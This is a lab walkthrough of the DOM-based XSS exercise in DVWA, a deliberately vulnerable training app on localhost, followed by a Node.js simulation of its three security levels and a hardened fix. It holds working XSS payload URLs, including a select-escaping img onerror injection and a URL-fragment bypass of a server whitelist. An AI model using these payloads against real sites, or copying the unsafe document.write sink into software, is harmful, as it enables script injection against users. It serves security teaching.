### DOM XSS
### ① Low
Vulnerable code:
```
<?php
# Don't need to do anything, protction handled on the client side
?>
```
The server performs no validation at all; the only processing of `default` happens in the page's own JavaScript, which copies everything after `default=` from `document.location.href` into the `<select>` with `document.write`. The payload is therefore written straight into the URL (URL-encoded here; `decodeURI` in the page turns it back into markup before it is written):
```
http://localhost:8080/dvwa/vulnerabilities/xss_d/?default=English%3Cscript%3Ealert(1)%3C/script%3E
```
Pop-up:
![](/upload/attach/201710/201710301749_l44zl5jlgzxtqi1.jpg)
### ② Medium
Vulnerable code:
```
<?php
// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {
$default = $_GET['default'];
# Do not allow script tags
if (stripos ($default, "<script") !== false) {
header ("location: ?default=English");
exit;
}
}
?>
```
```
<p>Please choose a language:</p>
<form name="XSS" method="GET">
<select name="default">
<script>
if (document.location.href.indexOf("default=") >= 0) {
var lang = document.location.href.substring(document.location.href.indexOf("default=")+8);
document.write("<option value='" + lang + "'>" + decodeURI(lang) + "</option>");
document.write("<option value='' disabled='disabled'>----</option>");
}
document.write("<option value='English'>English</option>");
document.write("<option value='French'>French</option>");
document.write("<option value='Spanish'>Spanish</option>");
document.write("<option value='German'>German</option>");
</script>
</select>
<input type="submit" value="Select" />
</form>
```
Analysis and exploitation:
`array_key_exists` checks whether the array contains the given key, so the filter only runs when `default` is present and not null.
`stripos` returns the position of the first occurrence of `<script` in `default` (case-insensitive), or `false` if it is not found; when it is found the server redirects to `?default=English` and exits.
So the `<script>` tag can no longer be used, but the filter looks for that one substring only, and other tags such as `<img>` with an event handler pass it. One detail matters here: the injected value is written while the HTML parser is still inside the `<select>`, where it ignores `<img>` and most other start tags (`<script>` is one of the few it still processes, which is why the Low payload works as-is). First close the `</option>` and `</select>` tags, then inject the `<img>`.
Construct the payload:
```
http://localhost:8080/dvwa/vulnerabilities/xss_d/?default=English%3C/option%3E%3C/select%3E%3Cimg%20src=%27x%27%20onerror=%27alert(1)%27%3E
```
### ③ High
Vulnerable code:
```
<?php

// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {

    # White list the allowable languages
    switch ($_GET['default']) {
        case "French":
        case "English":
        case "German":
        case "Spanish":
            # ok
            break;
        default:
            header ("location: ?default=English");
            exit;
    }
}

?>
```
Analysis and exploitation:
Any value that matches none of the `case` labels falls into the `default` branch and is redirected, so the query parameter itself must be one of the four whitelisted names. The check only sees what the server receives, however: everything after `#` (the URL fragment) is never sent to the server, while the client-side script reads the full `document.location.href` and uses everything after `default=`. Set `default=English` to satisfy the whitelist and place the payload in the fragment:
```
/vulnerabilities/xss_d/?default=English#<script>alert(1)</script>
```
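To make the three levels concrete, here is an added example, written for this page and not DVWA's own code, that models the client-side sink from the page's JavaScript and the Low, Medium and High server-side checks in Node.js, then runs the payloads from the Medium and High sections through them. Node's `URL` class follows the WHATWG URL standard, the same rules modern browsers apply to `document.location.href`, so the simulation matches what the page script sees. The function names (`clientSinkMarkup`, `simulate`, `safeOptionMarkup`) and the hardened variant at the end are assumptions of this example.

```javascript
// Added example (not DVWA's code): a Node.js model of the DVWA DOM XSS page's
// client-side sink and of its Low/Medium/High server-side checks.

const BASE = "http://localhost:8080/dvwa/vulnerabilities/xss_d/";

// What the page's inline script does with document.location.href:
// everything after "default=" is written into the <select>, raw in the
// value attribute and URL-decoded (decodeURI) in the option text.
function clientSinkMarkup(href) {
  const i = href.indexOf("default=");
  if (i < 0) return "";
  const lang = href.substring(i + 8);
  return "<option value='" + lang + "'>" + decodeURI(lang) + "</option>";
}

// The server only receives the query string, URL-decoded like PHP's $_GET.
// The fragment (#...) is never sent, so neither check below can see it.
function mediumCheck(def) {
  // PHP: stripos($default, "<script") !== false  ->  redirect
  if (def !== null && def.toLowerCase().includes("<script")) return "redirect";
  return "ok";
}

function highCheck(def) {
  if (def === null) return "ok"; // array_key_exists guard: no parameter, no check
  const allowed = ["French", "English", "German", "Spanish"];
  return allowed.includes(def) ? "ok" : "redirect";
}

const LEVEL_CHECKS = { low: () => "ok", medium: mediumCheck, high: highCheck };

// One request through a level: the server check runs on the decoded query
// parameter; if the page is served, the client sink runs on the full href.
function simulate(level, url) {
  const u = new URL(url);
  const verdict = LEVEL_CHECKS[level](u.searchParams.get("default"));
  if (verdict === "redirect") return { blocked: true, markup: "" };
  return { blocked: false, markup: clientSinkMarkup(u.href) };
}

// Hardened client side (an assumed fix, not DVWA's): parse the URL instead of
// slicing the href, so the fragment is ignored and decoding happens once,
// and apply the whitelist where the value is actually used. In a browser,
// build the <option> with document.createElement/textContent, not document.write.
const ALLOWED_LANGS = ["English", "French", "Spanish", "German"];
function safeOptionMarkup(href) {
  const lang = new URL(href).searchParams.get("default");
  if (!ALLOWED_LANGS.includes(lang)) return "";
  return "<option value='" + lang + "'>" + lang + "</option>";
}

// Constructed payloads, taken from the walkthrough above.
const PAYLOADS = {
  low: BASE + "?default=English%3Cscript%3Ealert(1)%3C/script%3E",
  medium: BASE + "?default=English%3C/option%3E%3C/select%3E%3Cimg%20src=%27x%27%20onerror=%27alert(1)%27%3E",
  high: BASE + "?default=English#<script>alert(1)</script>",
};

for (const [level, url] of Object.entries(PAYLOADS)) {
  const r = simulate(level, url);
  console.log(level + ":", r.blocked ? "blocked by server" : "rendered: " + r.markup);
}
console.log("medium vs <script> payload:", simulate("medium", PAYLOADS.low).blocked ? "blocked" : "rendered");
console.log("high vs query payload:", simulate("high", BASE + "?default=English%3Cscript%3E").blocked ? "blocked" : "rendered");
console.log("hardened sink on the fragment payload:", JSON.stringify(safeOptionMarkup(PAYLOADS.high)));
```

Running it shows the Low payload rendered as a `<script>` element, the Medium filter catching `<script` (in any case) but passing the `</option></select><img onerror>` payload, and the High whitelist rejecting `English<script>` in the query while accepting `English` with the whole payload sitting in the fragment; the hardened sink reduces the same fragment URL to a plain `English` option.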